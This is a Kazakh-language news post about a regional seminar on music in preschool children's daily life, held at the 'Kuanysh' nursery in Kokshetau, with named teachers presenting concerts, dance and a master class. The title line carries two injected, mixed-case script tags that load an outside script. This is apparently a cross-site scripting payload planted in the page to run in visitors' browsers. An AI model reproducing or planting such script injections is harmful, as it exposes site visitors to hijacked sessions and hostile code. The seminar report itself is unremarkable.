Балалардың күнделікті өміріндегі музыка - облыстық семинар<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

16.04.2024

Балалардың күнделікті өміріндегі музыка

 

Ағымдағы жылдың 10 сәуір  күні Көкшетау қаласында  «Қуаныш» бөбекжайында «Шығармашылық» білім беру саласының заттық-кеңестік дамытушы ортасын ұйымдастыру» тақырыбында облыстық семинар өткізілді. Семинарға  балабақшалардың музыка жетекшілері қатысты.

Семинар барысында бөбекжайдың музыка жетекшісі Бейсембаева Асем Айбасовна мектеп жасына дейінгі балаларға музыкалық тәрбие беру мақсатында «Ұлттық музыкалық аспаптар – атадан қалған мұра» оркестровый концерт, Жанабаева Дариға Маратовна би арқылы балалардың шығармашылық жүйелі жұмыстар жүргізу бойынша іс-тәжірибелерімен бөлісті.  

Сонымен қатар бөбекжайдың педагогтері Зкрина Умит Егинбаевна, Серикбаева Айзат Жақсылыковна «Ертегі желісіндегі тапсырмалар» сахналау, Даирова Сания Муратбековна «Асық-алтын қазына»  шебер сыныбын өткізді. Семинар соңында қатысушылармен кері байланыс жасау барысында музыка жетекшісінің бүгінгі бөліскен іс- тәжірибесінен  алған  әсерлері және қажетті мәліметтер жинақтағандығын айтты.

Просмотров: 396


Пікір қосу



Деректерді қолтаңбаға қосу